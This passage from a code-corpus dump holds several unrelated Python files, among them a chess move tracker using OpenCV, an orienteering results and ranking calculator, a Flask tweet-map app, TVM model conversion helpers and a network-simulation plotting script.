phi_true\n\t\n\tmean = np.mean(error)\n\tstdev = np.std(error)\n\n\tprint(mean, stdev)\n\treturn(mean, stdev)\n\n\nif __name__ ==\t\"__main__\":\n\n\n\ttest_number = sys.argv[1]\n\n\tfor w in ([\"SF\", \"cam\"]):\n\t#for w in ([\"SF\"]):\n\t\tprint(w)\n\n\t\tt_est, phi_est = read_estimation_robot(test_number, w)\n\t\t#t_est, phi_est =0,0\n\t\tt_all, t_0, x, y, alpha = read_truth_localization(test_number)\n\t\t#t_all, t_0, x, y, alpha = 0,0,0,0,0\n\t\tmean, stdev = evaluate_estimation(phi_est, t_est, t_all, t_0, x, y, alpha, w)\n\n\t\twrite_to_file(test_number, w, mean, stdev)","sub_path":"eval_curve_3_straight.py","file_name":"eval_curve_3_straight.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243510596","text":"import cv2\nimport glob\nimport os\nimport base64\nimport struct\n\n# The LUT decode format (from packed base64)\nDECODE_FORMAT = ''.join(['B'] * 256)\n\nclass Tile(object):\n\n def __init__(self, filename, tx=-1, ty=-1, tz=-1):\n '''\n '''\n self._filename = filename\n self._basename = os.path.splitext(self._filename)[0]\n self._tx = tx\n self._ty = ty\n self._tz = tz\n\n self._width = -1\n self._height = -1\n\n self._imagedata = None\n\n @property\n def id(self):\n return self._filename\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, value):\n self._width = value\n\n @property\n def height(self):\n return self._height\n\n @height.setter\n def height(self, value):\n self._height = value\n\n def load(self, directory, file_prefix='', ratio_x=1, ratio_y=1, lut_base64=None):\n '''\n '''\n\n file_path = os.path.join(directory, file_prefix + self._basename)\n file = glob.glob(file_path + '.*')[0]\n\n # this is grayscale loading with any OpenCV version\n imagedata = cv2.imread(file, 0)\n\n # Apply the look up table of the tile\n if lut_base64 is not None:\n lut = struct.unpack(DECODE_FORMAT, base64.b64decode(lut_base64))\n imagedata = cv2.LUT(imagedata, lut)\n return imagedata\n\n @staticmethod\n def from_string(string):\n '''\n Creates a new image from a string.\n '''\n\n string = string.strip() # remove some weird line break\n values = string.split() # split the string\n\n # right now we have something like this\n # ['021_000001_003_2015-01-14T1653216213670.bmp', '2189614.003',\n # '1853228.961', '0']\n\n tile = Tile(\n values[0], float(\n values[1]), float(\n values[2]), float(\n values[3]))\n # print values\n return tile\n","sub_path":"mbeam/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243270099","text":"#!/usr/bin/python3\n\n'''\n\n215 = 32768 and the sum of its digits is 3 + 2 + 7 + 6 + 8 = 26.\n\nWhat is the sum of the digits of the number 21000?\n\n'''\n\n\nclass Main():\n def __init__(self):\n digits = list(str(2**1000))\n # convert string digits to integers\n digits = list(map(int, digits))\n self.answer = sum(digits)\n","sub_path":"problem0016.py","file_name":"problem0016.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455623820","text":"\"\"\"\nThis script runs the TwitterMapProj application using a development server.\n\"\"\"\n\nfrom os import environ, system\nfrom datetime import datetime\nfrom flask import render_template, jsonify, Flask\nfrom pyes import *\n\nfrom DataFetcher import DataFetcher\nfrom TweetsProcessor import TweetsProcessor\n\napplication = app = Flask(__name__)\ntweetsProcessor = None\n\ndef init_tweetsprocessor():\n global tweetsProcessor\n dataFetcher = DataFetcher()\n #tweets_dict = dataFetcher.run_all()\n dataFetcher.parse_data()\n tweets_dict = dataFetcher.get_dict()\n tweetsProcessor = TweetsProcessor(tweets_dict)\n tweetsProcessor.prepare()\n\n@app.route('/')\n@app.route('/home')\ndef home():\n \"\"\"Renders the home page.\"\"\"\n\n return render_template(\n 'mainTwitterMap.html',\n title='Main Twitter Map Page',\n year=datetime.now().year,\n )\n\n@app.route('/getTwits/')\ndef get_tweets(keywords):\n global tweetsProcessor\n tokens = keywords.split()\n words = ''\n for t in tokens[:-2]:\n words += t + ' '\n lat = float(tokens[-2])\n lng = float(tokens[-1])\n\n words = words.encode('utf-8')\n data = []\n\n results = tweetsProcessor.get_similar_tweets(words, lat, lng)\n\n for line in results:\n data.append({'longitude': line[3]['coordinates'][0], 'latitude': line[3]['coordinates'][1], 'text': line[0]})\n return jsonify({'data':data})\n\n@app.route('/refetch')\ndef refetch():\n init_tweetsprocessor()\n return jsonify({'status': 'ok'})\n\nif __name__ == '__main__':\n global tweetsProcessor\n if tweetsProcessor is None:\n init_tweetsprocessor()\n app.run(debug=True, host='0.0.0.0')\n #app.run()","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489338564","text":"# pylint: disable=too-many-arguments, E1101\n\"\"\" Module for tvm stage. \"\"\"\nimport torch\n\nimport tvm\nfrom tvm import relay\nfrom tvm.relay.frontend.pytorch import get_graph_input_names\nfrom tvm.contrib import graph_runtime\n\n__all__ = ['convert_model', 'compile_model', 'eval_model']\n\n\ndef convert_model(model, input_shape):\n \"\"\"\n Convert a pytorch model to tvm model.\n \"\"\"\n input_data = torch.randn(input_shape)\n scripted_model = torch.jit.trace(model, input_data).eval()\n input_name = get_graph_input_names(scripted_model)[0] # only one input\n shape_dict = {input_name: input_shape}\n mod, params = relay.frontend.from_pytorch(scripted_model, shape_dict)\n return mod, params, input_name\n\n\ndef compile_model(mod, params, target='llvm', target_host='llvm', opt_level=3):\n \"\"\"\n Compile the tvm model.\n \"\"\"\n with relay.build_config(opt_level=opt_level):\n graph, lib, params = relay.build(mod,\n target=target,\n target_host=target_host,\n params=params)\n return graph, lib, params\n\n\ndef eval_model(graph, lib, params, ctx, input_name, input_data):\n \"\"\"\n Evaluate the model with input data.\n \"\"\"\n mod = graph_runtime.create(graph, lib, ctx)\n # Set inputs\n mod.set_input(input_name, tvm.nd.array(input_data.astype('float32')))\n mod.set_input(**params)\n # Execute\n mod.run()\n # Get outputs\n tvm_output = mod.get_output(0)\n return tvm_output\n","sub_path":"sustech_nas/tvm_stage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325574417","text":"import chess\nfrom chess import pgn\nfrom chesscv import BoardDetector, show_wait_destroy\nfrom piece_classifier import train_piece_classifier, get_piece_prediction\n\nimport os\n# if this is running on a pi, then import picamera\nif os.uname()[4][:3].startswith('arm'):\n from picamera.array import PiRGBArray\n from picamera import PiCamera\nimport time\nimport cv2 as cv\nimport numpy as np\n\nclass InvalidMove(Exception):\n pass\n\ndef track_game(video, outfile):\n board_detector = BoardDetector(display=True)\n move_tracker = MoveTracker()\n\n if video is None:\n camera = PiCamera(resolution=(720,720))\n rawCapture = PiRGBArray(camera)\n time.sleep(2.0)\n camera.capture(rawCapture, format=\"bgr\")\n first_frame = rawCapture.array\n params, ps = board_detector.locate_squares(first_frame)\n move_tracker.set_square_coordinates(params, ps)\n rawCapture.truncate(0)\n for frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n frame = board_detector.transform_image(frame)\n move_tracker.process_image(frame)\n\n rawCapture.truncate(0)\n else:\n vs = cv.VideoCapture(video)\n board_found = False\n while not board_found:\n _, first_frame = vs.read()\n try:\n params, ps = board_detector.locate_squares(first_frame)\n move_tracker.set_square_coordinates(params, ps)\n move_tracker.set_first_frame(board_detector.transform_image(first_frame))\n board_found = True\n except TypeError:\n continue\n classifier_trained = False\n while (vs.isOpened()):\n ret, frame = vs.read()\n if not ret:\n break\n cv.imshow('frame', frame)\n frame = board_detector.transform_image(frame)\n if cv.waitKey(100) & 0xFF == ord('q'):\n break\n if not classifier_trained:\n move_tracker.train_piece_classifier(frame)\n classifier_trained = True\n move_tracker.process_image(frame)\n output_game_to_file(move_tracker.board, outfile)\n\ndef output_game_to_file(board, outfile):\n game = pgn.Game()\n node = None\n for move in board.move_stack:\n if node is None:\n node = game.add_variation(move)\n else:\n node = node.add_variation(move)\n print(game, file=open(outfile, 'w'), end='\\n\\n')\n\nclass Square():\n \"\"\"\n object for a single square on the board\n \"\"\"\n def __init__(self, board_coords, image_coords):\n self.board_coords = board_coords\n self.image_coords = image_coords\n\n def get_delta(self, prev_frame, curr_frame):\n prev_image = self.get_image(prev_frame)\n curr_image = self.get_image(curr_frame)\n return cv.absdiff(prev_image, curr_image)\n\n def get_image(self, image):\n x0, x1, y0, y1 = self.image_coords\n return image[y0:y1,x0:x1]\n\n def display(self, image):\n square = self.get_image(image)\n show_wait_destroy(\"{},{}\".format(*self.board_coords), square)\n\nclass MoveTracker():\n \"\"\"\n Class to detect moves made on the board\n \"\"\"\n def __init__(self):\n self.last_still_frame = None\n self.prev_frame = None\n self.board = chess.Board()\n self.white_side = None\n\n def process_image(self, frame):\n #frame = cv.GaussianBlur(frame, (5, 5), 0)\n\n if self.prev_frame is None:\n self.prev_frame = frame\n return\n\n # compute the absolute difference between the previous frame and the current frame\n frame_delta = cv.absdiff(self.prev_frame, frame)\n first_delta = cv.absdiff(self.last_still_frame, frame)\n if np.all(frame_delta < 40) and np.percentile(first_delta, 90) < 50: #image is still\n #show_wait_destroy('still: {0:.2f}'.format(np.percentile(first_delta, 90)), frame)\n # so see if the board differs from the last still board\n move_candidates = []\n for move in self.board.legal_moves:\n if self.white_side is None:\n #first calculate as if it is left side, then right side\n from_square = self.get_square(move.from_square, 'left') \n to_square = self.get_square(move.to_square, 'left')\n if self.detect_move(from_square, to_square, frame):\n self.white_side = 'left'\n print(\"White side is left\")\n move_candidates.append(move)\n from_square = self.get_square(move.from_square, 'right')\n to_square = self.get_square(move.to_square, 'right')\n if self.detect_move(from_square, to_square, frame):\n self.white_side = 'right'\n print(\"White is is right\")\n move_candidates.append(move)\n else:\n from_square = self.get_square(move.from_square)\n to_square = self.get_square(move.to_square)\n if self.detect_move(from_square, to_square, frame):\n move_candidates.append(move)\n move_made = None\n if len(move_candidates) == 1:\n move_made = move_candidates[0]\n elif len(move_candidates) > 1:\n move_made = self.check_for_castle(move_candidates)\n if not move_made:\n move_made = self.filter_multiple_moves(move_candidates, frame)\n if not move_made: \n import pdb; pdb.set_trace()\n if move_made is not None:\n self.board.push(move_made)\n print(self.board)\n print('-' * 50)\n show_wait_destroy(move_made.uci(), frame)\n self.last_still_frame = frame\n self.prev_frame = frame\n\n def check_for_castle(self, move_candidates):\n if self.board.turn == chess.WHITE:\n if chess.Move.from_uci('e1g1') in move_candidates:\n return chess.Move.from_uci('e1g1')\n elif chess.Move.from_uci('e1c1') in move_candidates:\n return chess.Move.from_uci('e1c1')\n else:\n if chess.Move.from_uci('e8g8') in move_candidates:\n return chess.Move.from_uci('e8g8')\n elif chess.Move.from_uci('e8c8') in move_candidates:\n return chess.Move.from_uci('e8c8')\n return None\n\n def detect_move(self, from_square, to_square, frame):\n from_pred = self.get_piece_prediction(from_square.get_image(frame))\n to_pred = self.get_piece_prediction(to_square.get_image(frame))\n from_delta = from_square.get_delta(self.last_still_frame, frame)\n to_delta = to_square.get_delta(self.last_still_frame, frame)\n if np.median(from_delta) < 15 or np.median(to_delta) < 15:\n return False\n if np.median(from_delta) > 30 and np.median(to_delta) > 30:\n return True\n if from_pred < -2 and to_pred > 0:\n# cv.imshow('from_curr: {0:.3f}'.format(from_pred), from_square.get_image(frame))\n# show_wait_destroy('to_curr: {0:.3f}'.format(to_pred), to_square.get_image(frame))\n return True\n # if the from square definitely doesn't have a piece, then take a closer look at\n # the to squares\n elif from_pred < -3: \n print(\"Taking a closer look at to_square\")\n to_pred = self.get_piece_prediction(to_square.get_image(frame), True)\n cv.imshow('from_curr: {0:.3f}'.format(from_pred), from_square.get_image(frame))\n show_wait_destroy('to_curr: {0:.3f}'.format(to_pred), to_square.get_image(frame))\n if to_pred > 0 and np.median(to_delta) > 25:\n return True\n return False\n\n def filter_multiple_moves(self, move_candidates, frame):\n # if all moves have the same from_square, then just look at the to squares\n if np.all([m.from_square == move_candidates[0].from_square for m in move_candidates]):\n deltas = []\n for move in move_candidates:\n to_square = self.get_square(move.to_square)\n to_delta = to_square.get_delta(self.last_still_frame, frame)\n deltas.append(np.median(to_delta))\n # if one delta median is 2x greater than the rest, then chose that one\n if np.all([np.max(deltas) > 2*d for i, d in enumerate(deltas) if i != np.argmax(deltas)]):\n return move_candidates[np.argmax(deltas)]\n\n def get_square(self, square_id, side=None):\n if side is None:\n side = self.white_side\n if side == 'left':\n return self.squares[square_id]\n else:\n return self.squares[63 - square_id]\n\n def set_square_coordinates(self, params, perspective_shift):\n self.squares = []\n x, y ,s = params\n p0 = perspective_shift[0]\n for i in range(8):\n p_i = min(i, 7-i)\n lo_shift = -perspective_shift[p_i] if i < 4 else perspective_shift[p_i + 1]\n hi_shift = -perspective_shift[p_i + 1] if i < 4 else perspective_shift[p_i]\n x_lo = i * s + lo_shift + p0\n x_hi = (i + 1) * s + hi_shift + p0\n for j in range(8):\n p_j = min(j, 7-j)\n lo_shift = -perspective_shift[p_j] if j < 4 else perspective_shift[p_j + 1]\n hi_shift = -perspective_shift[p_j + 1] if j < 4 else perspective_shift[p_j]\n y_lo = j * s + lo_shift + p0\n y_hi = (j + 1) * s + hi_shift + p0\n self.squares.append(Square((i, j), (x_lo, x_hi, y_lo, y_hi)))\n\n def set_first_frame(self, frame):\n self.last_still_frame = frame\n \n def train_piece_classifier(self, frame):\n images = []\n labels = []\n for i, square in enumerate(self.squares):\n try:\n image = cv.resize(square.get_image(frame), (32, 32), interpolation=cv.INTER_AREA)\n except:\n import pdb; pdb.set_trace()\n image = image/255\n label = 1 if i < 16 or i > 47 else 0\n for image in generate_transformations(image):\n images.append(image)\n labels.append(label)\n images = np.array(images)\n images = images.reshape(-1, 1, 32, 32)\n labels = np.array(labels)\n labels = labels.reshape(-1, 1)\n self.piece_classifier = train_piece_classifier(images, labels)\n\n def get_piece_prediction(self, orig_image, transform = False):\n image = np.copy(orig_image)\n image = cv.resize(image, (32, 32), interpolation=cv.INTER_AREA)\n image = image/255\n if transform:\n preds = []\n for image in generate_transformations(image, True):\n image = image.reshape(1, 1, 32, 32)\n pred = get_piece_prediction(self.piece_classifier, image)\n preds.append(get_piece_prediction(self.piece_classifier, image))\n return np.max(preds)\n else:\n image = image.reshape(1, 1, 32, 32)\n return get_piece_prediction(self.piece_classifier, image)\n\ndef generate_transformations(image, roll=False):\n \"\"\" function to make mirror and rotation transformations \"\"\"\n for j in range(4):\n new_image = np.copy(image)\n rotation_matrix = cv.getRotationMatrix2D((16, 16), j * 90, 1.0)\n new_image = cv.warpAffine(new_image, rotation_matrix, (32, 32))\n yield new_image\n new_image = np.copy(image)\n new_image = cv.flip(new_image, 0)\n for j in range(4):\n new_image = np.copy(new_image)\n rotation_matrix = cv.getRotationMatrix2D((16, 16), j * 90, 1.0)\n new_image = cv.warpAffine(new_image, rotation_matrix, (32, 32))\n yield new_image\n if roll:\n for i in range(6):\n new_image = np.copy(image)\n new_image = np.roll(new_image, i, 0)\n for j in range(6):\n new_image = np.roll(new_image, j, 1)\n yield new_image\n \n\nif __name__ == \"__main__\":\n import argparse\n \n parser = argparse.ArgumentParser(description='Track a chess game over a live board')\n parser.add_argument('-v', '--video', dest='video', default=None, help='path to video file')\n parser.add_argument('-o', '--outfile', dest='outfile', default=\"./game.pgn\"\n , help='path to output pgn file')\n\n args = parser.parse_args()\n\n track_game(args.video, args.outfile)\n\n\n","sub_path":"game_tracker.py","file_name":"game_tracker.py","file_ext":"py","file_size_in_byte":11260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369452919","text":"import logging\n\nfrom sportorg.core.otime import OTime\nfrom sportorg.language import _\nfrom sportorg.models.memory import race, Result, Person, ResultStatus, Course, Group, Qualification, RankingItem, \\\n RelayTeam, RaceType\nfrom sportorg.models.result.result_checker import find_course\nfrom sportorg.utils.time import time_to_hhmmss\n\n\n# FIXME: does not work sorting\nclass ResultCalculation(object):\n def process_results(self):\n logging.debug('Process results')\n self.set_times()\n race().relay_teams.clear()\n for i in race().groups:\n if not i.get_type() == RaceType.RELAY:\n # single race\n array = self.get_group_finishes(i)\n self.set_places(array)\n self.set_rank(i)\n else:\n # relay\n new_relays = self.process_relay_results(i)\n race().relay_teams.append(new_relays)\n\n def set_times(self):\n for i in race().results:\n assert isinstance(i, Result)\n i.result = i.get_result_for_sort()\n\n @staticmethod\n def get_group_finishes(group):\n ret = []\n for i in race().results:\n assert isinstance(i, Result)\n person = i.person\n if person:\n assert isinstance(person, Person)\n if person.group == group:\n ret.append(i)\n ret.sort()\n group.count_finished = len(ret)\n return ret\n\n @staticmethod\n def get_group_persons(group):\n assert isinstance(group, Group)\n ret = []\n for i in race().persons:\n person = i\n assert isinstance(person, Person)\n if person.group == group:\n ret.append(i)\n group.count_person = len(ret)\n return ret\n\n def set_places(self, array):\n assert isinstance(array, list)\n current_place = 1\n last_place = 1\n last_result = 0\n for i in range(len(array)):\n res = array[i]\n assert isinstance(res, Result)\n\n res.place = ''\n # give place only if status = OK\n if res.status == ResultStatus.OK:\n # skip if out of competition\n if res.person.is_out_of_competition:\n res.place = _('o/c')\n continue\n\n # the same place processing\n if current_place == 1 or res.result != last_result:\n # result differs from previous - give next place\n last_result = res.result\n last_place = current_place\n\n res.place = last_place\n current_place += 1\n\n def process_relay_results(self, group):\n if group and isinstance(group, Group):\n results = self.get_group_finishes(group)\n\n relay_teams = {}\n for res in results:\n assert isinstance(res, Result)\n bib = res.person.bib\n\n team_number = bib % 1000\n if not str(team_number) in relay_teams:\n new_team = RelayTeam()\n new_team.group = group\n new_team.bib_number = team_number\n relay_teams[str(team_number)] = new_team\n\n team = relay_teams[str(team_number)]\n assert isinstance(team, RelayTeam)\n team.add_result(res)\n teams_sorted = sorted(relay_teams.values())\n place = 1\n for cur_team in teams_sorted:\n cur_team.set_place(place)\n place += 1\n\n return relay_teams.values()\n\n def set_rank(self, group):\n assert isinstance(group, Group)\n ranking = group.ranking\n results = self.get_group_finishes(group)\n\n # initial turning off, for disabling ranking\n for i in results:\n i.assigned_rank = Qualification.NOT_QUALIFIED\n\n if ranking.is_active:\n rank = self.get_group_rank(group)\n ranking.rank_scores = rank\n if rank > 0:\n leader_result = results[0]\n assert isinstance(leader_result, Result)\n leader_time = leader_result.get_result_otime()\n for i in ranking.rank.values():\n assert isinstance(i, RankingItem)\n if i.is_active and i.use_scores:\n i.max_time = self.get_time_for_rank(leader_time, i.qual, rank)\n i.percent = self.get_percent_for_rank(i.qual, rank)\n\n # Rank assigning for all athletes\n for i in results:\n assert isinstance(i, Result)\n result_time = i.get_result_otime()\n place = i.place\n\n if i.person.is_out_of_competition or i.status != ResultStatus.OK:\n continue\n\n qual_list = sorted(ranking.rank.values(), reverse=True, key=lambda item: item.qual.get_scores())\n for j in qual_list:\n assert isinstance(j, RankingItem)\n if j.is_active:\n if isinstance(place, int) and j.max_place >= place:\n i.assigned_rank = j.qual\n break\n if j.max_time and j.max_time >= result_time:\n i.assigned_rank = j.qual\n break\n\n def get_group_rank(self, group):\n \"\"\"\n Rank calculation, takes sums or scores from qualification of best 10 athletes, who have OK result and not o/c\n :param group:\n :return: rank of group, -1 if we have < 10 successfull results\n \"\"\"\n scores = []\n array = self.get_group_finishes(group)\n\n if len(array) < 10:\n # less than 10 started\n return -1\n\n for i in array:\n assert isinstance(i, Result)\n if i.status == ResultStatus.OK:\n person = i.person\n if not person.is_out_of_competition:\n qual = person.qual\n scores.append(qual.get_scores())\n\n if len(scores) < 5:\n # less than 5 finished and not disqualified\n return -1\n\n if len(scores) <= 10:\n # get rank sum of 10 best finished\n return sum(scores)\n\n scores = sorted(scores)\n return sum(scores[-10:])\n\n def get_percent_for_rank(self, qual, rank):\n table = []\n if qual == Qualification.I:\n table = [\n (1000, 136),\n (850, 133),\n (750, 130),\n (650, 127),\n (500, 124),\n (425, 121),\n (375, 118),\n (325, 115),\n (250, 112),\n (211, 109),\n (185, 106),\n (159, 103),\n (120, 100)\n ]\n elif qual == Qualification.II:\n table = [\n (1000, 151),\n (850, 148),\n (750, 145),\n (650, 142),\n (500, 139),\n (425, 136),\n (375, 133),\n (325, 130),\n (250, 127),\n (211, 124),\n (185, 121),\n (159, 118),\n (120, 115),\n (102, 112),\n (90, 109),\n (78, 106),\n (60, 103),\n (51, 100)\n ]\n elif qual == Qualification.III:\n table = [\n (1000, 169),\n (850, 166),\n (750, 163),\n (650, 160),\n (500, 157),\n (425, 154),\n (375, 151),\n (325, 148),\n (250, 145),\n (211, 142),\n (185, 139),\n (159, 136),\n (120, 133),\n (102, 130),\n (90, 127),\n (78, 124),\n (60, 121),\n (51, 118),\n (45, 115),\n (39, 112),\n (30, 109),\n (27, 106),\n (25, 103),\n (23, 100)\n ]\n elif qual == Qualification.I_Y:\n table = [\n (650, 0),\n (500, 192),\n (425, 188),\n (375, 184),\n (325, 180),\n (250, 176),\n (211, 172),\n (185, 168),\n (159, 164),\n (120, 160),\n (102, 156),\n (90, 152),\n (78, 148),\n (60, 144),\n (51, 140),\n (45, 136),\n (39, 132),\n (30, 128),\n (27, 124),\n (25, 120),\n (23, 116),\n (20, 112),\n (17, 108),\n (15, 104),\n (13, 100)\n ]\n elif qual == Qualification.II_Y:\n table = [\n (425, 0),\n (375, 215),\n (325, 210),\n (250, 205),\n (211, 200),\n (185, 195),\n (159, 190),\n (120, 185),\n (102, 180),\n (90, 175),\n (78, 170),\n (60, 165),\n (51, 160),\n (45, 155),\n (39, 150),\n (30, 145),\n (27, 140),\n (25, 135),\n (23, 130),\n (20, 125),\n (17, 120),\n (15, 116),\n (13, 112),\n (11, 108),\n (10, 105),\n (7, 102),\n (5, 100)\n ]\n\n for i in range(len(table)):\n cur_value = table[i][0]\n if cur_value <= rank:\n return table[i][1]\n return 0\n\n def get_time_for_rank(self, leader_time, qual, rank):\n percent = self.get_percent_for_rank(qual, rank)\n assert isinstance(leader_time, OTime)\n msec_new = round(leader_time.to_msec() * percent / 100)\n ret = OTime(msec=msec_new)\n return ret\n\n\ndef get_start_list_data():\n pass\n\n\ndef get_result_data():\n \"\"\"\n\n :return: {\n \"title\": str,\n \"groups\": [\n {\n \"name\": str,\n \"persons\": [\n get_person_result_data\n ...\n ]\n }\n ]\n }\n \"\"\"\n data = []\n for group in race().groups:\n array = ResultCalculation().get_group_finishes(group)\n group_data = {\n 'name': group.name,\n 'persons': []\n }\n for res in array:\n assert isinstance(res, Result)\n person_data = get_person_result_data(res)\n group_data['persons'].append(person_data)\n data.append(group_data)\n ret = {'groups': data, 'title': 'Competition title'}\n\n return ret\n\n\ndef get_splits_data():\n pass\n\n\ndef get_splits_data_printout(person):\n ret = {}\n person_json = {}\n result_json = {}\n legs = []\n\n assert isinstance(person, Person)\n group = person.group\n # course = group.course\n course = find_course(person)\n assert isinstance(course, Course)\n result = person.result\n\n person_json['name'] = person.full_name\n person_json['group'] = person.group.name\n person_json['bib'] = person.bib\n person_json['team'] = person.organization.name\n person_json['sportident_card'] = int(person.sportident_card)\n\n result_json['start'] = time_to_hhmmss(person.start_time)\n result_json['finish'] = time_to_hhmmss(result.get_finish_time())\n result_json['result'] = result.get_result()\n result_json['penalty_time'] = time_to_hhmmss(result.get_penalty_time())\n result_json['status'] = result.status\n result_json['place'] = result.place\n result_json['group_count_all'] = person.group.get_count_all()\n result_json['group_count_finished'] = person.group.get_count_finished()\n\n person_index = 0\n course_index = 0\n course_code = course.controls[course_index].code\n leg_start_time = result.get_start_time()\n start_time = result.get_start_time()\n\n while person_index < len(result.splits):\n cur_split = result.splits[person_index]\n cur_code = cur_split.code\n cur_time = cur_split.time\n\n leg = {}\n leg['code'] = cur_code\n leg['index'] = person_index\n leg['absolute_time'] = time_to_hhmmss(cur_time)\n leg['relative_time'] = time_to_hhmmss(cur_time - start_time)\n\n status = 'correct'\n if course_code == cur_code:\n leg_time = cur_time - leg_start_time\n leg_start_time = cur_time\n\n leg['leg_time'] = time_to_hhmmss(leg_time)\n leg['course_index'] = course_index\n\n leg['leg_speed'] = 'xx m/km' # TODO calculate speed\n leg['leg_place'] = '1' # TODO\n leg['leg_leader'] = 'John Smith' # TODO\n leg['leg_best_time'] = '00:00:21' # TODO\n\n course_index += 1\n if course_index >= len(course.controls):\n course_code = -1\n else:\n course_code = course.controls[course_index].code\n\n else:\n status = 'extra'\n\n leg['status'] = status\n legs.append(leg)\n\n person_index += 1\n\n ret['person'] = person_json\n ret['result'] = result_json\n ret['legs'] = legs\n\n return ret\n\n\ndef get_entry_statistics_data():\n pass\n\n\ndef get_team_statistics_data():\n pass\n\n\ndef get_person_result_data(res):\n person = res.person\n assert isinstance(person, Person)\n ret = {\n 'name': person.full_name,\n 'team': person.organization.name,\n 'qual': person.qual.get_title(),\n 'year': person.year,\n 'penalty_time': time_to_hhmmss(res.get_penalty_time()),\n 'result': res.get_result(),\n 'place': res.place,\n 'assigned_rank': res.assigned_rank.get_title()\n }\n return ret\n","sub_path":"sportorg/models/result/result_calculation.py","file_name":"result_calculation.py","file_ext":"py","file_size_in_byte":14251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347749738","text":"import calendar\nfrom operator import itemgetter\nfp = open('final_data.txt')\nborough_combi = {}\nfor lines in fp:\n\tline = lines.strip().split('\\t')\n\tkey = line[0]\n\ttrips = line[1].strip()\n\tkey = key.replace(\"'\", \"\")\n\tkey = key.replace(\"(\", \"\")\n\tkey = key.replace(\")\", \"\")\n\tkey = key.replace(\",\", \"-\")\n\tif borough_combi.get(key) == None:\n\t\tborough_combi[key] = int(trips)\n\telse:\n\t\tborough_combi[key] += int(trips)\n\nfw = open('final_data.csv', 'w')\nfw.write('Pickup & Dropoff, count of trips')\nfor data in borough_combi.keys():\n\tfw.write('\\n')\n\tfw.write(str(data) + ', '+str(borough_combi[data]))\nfw.close()\n'''\n\tprint(\"%s,%s\" %(key,trips))\n'''","sub_path":"Reduce_Files_Aggregation_Scripts/top_pickup-dropoff_combination/top_pick_drop_combo.py","file_name":"top_pick_drop_combo.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"308406972","text":"from .Error import ErrorUtils\nfrom ..state.CommandState import CommandState\n\nclass CommandUtils:\n def create_command(raw_command_string=None):\n if raw_command_string == None or len(raw_command_string.strip()) == 0:\n return ErrorUtils('COMMAND_STRING_EMPTY', 'Command string cannot be empty.')\n else:\n parsed_command = raw_command_string.split(' ')\n return { 'main_command': parsed_command[0], 'command_arguments': parsed_command[1:] }\n\n def execute_command(command=None):\n main_command = command.get('main_command')\n command_arguments = command.get('command_arguments')\n\n if isinstance(main_command, str) and isinstance(command_arguments, list):\n # check if the command is present in the commands dictionary in the command state\n command = CommandState.get('commands').get(main_command)\n\n if command != None:\n # execute the corresponding command in the commands dictionary\n return command(command_arguments)\n else:\n return ErrorUtils('COMMAND_NOT_FOUND', 'The command {} was not found.'.format(main_command))\n else:\n return ErrorUtils('INVALID_COMMAND', 'Type a valid command and then press ENTER key. Execute command \\'help\\' to get the list of available commands.')","sub_path":"src/utils/Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483015310","text":"#!/usr/bin/python\n\n'''\nIn Network Simulation project for Caltech CS 143, the following metrics are\nmeasured and then graphed as a time trace and overall average:\n For each link:\n -- link rate (Mbps)\n -- buffer occupancy (is this one per link?)\n -- packet loss\n For each flow:\n -- flow rate\n -- window size\n -- packet delay\nThe simulator records data into a .json file, from which data is extracted\nand graphed.\n'''\n\nimport json\nimport sys\nimport matplotlib.pyplot as plt \n\ndef loadAllData(filename):\n\t'''\n\tGiven the .json data file, sorts all data into their appropriate arrays\n\tfor later graphing. If a data point is 'null' it is skipped.\n\t'''\n\twith open(filename) as dataFile:\n\t\t# create array of events\n\t\tevents = json.load(dataFile)[\"Simulation Event Metrics\"]\n\t\n\t# initialize arrays and dicts that hold data\t\n\ttimes = []\n\tlinksData = {}\n\tflowsData = {}\n\n\tif events[0][\"Time\"] == 0:\n\t\t# initialize data storage arrays\n\t\ttimes.append(0)\n\t\t# initialize data storage arrays for links\n\t\tfor link in events[0][\"LinkData\"]:\n\t\t\tlinksData[link[\"LinkID\"]] = {\"Link Rate (Mbps)\" : [link[\"LinkRate\"]],\n\t\t\t \"Buffer Occupancy (pkts)\" : [link[\"BuffOcc\"]],\n\t\t\t \"Packet Loss (pkts)\" : [link[\"PktLoss\"]]}\n\t\tfor flow in events[0][\"FlowData\"]:\n\t\t\tflowsData[flow[\"FlowID\"]] = {\"Flow Rate (Mbps)\" : [flow[\"FlowRate\"]],\n\t\t\t\t \"Window Size (pkts)\" : [flow[\"WinSize\"]],\n\t\t\t\t \"Packet Delay (ms)\" : [flow[\"PktDelay\"]]}\n\n\t# continue sorting data from every event\n\tfor event in events[1:]:\n\t\t# get time\n\t\ttimes.append(event[\"Time\"])\n\t\t# get and store link data\n\t\tfor link in event[\"LinkData\"]:\n\t\t\tlinksData[link[\"LinkID\"]][\"Link Rate (Mbps)\"].append(link[\"LinkRate\"])\n\t\t\tlinksData[link[\"LinkID\"]][\"Buffer Occupancy (pkts)\"].append(link[\"BuffOcc\"])\n\t\t\tlinksData[link[\"LinkID\"]][\"Packet Loss (pkts)\"].append(link[\"PktLoss\"])\n\t\t\t\n\t\t# get and store flow data\n\t\tfor flow in 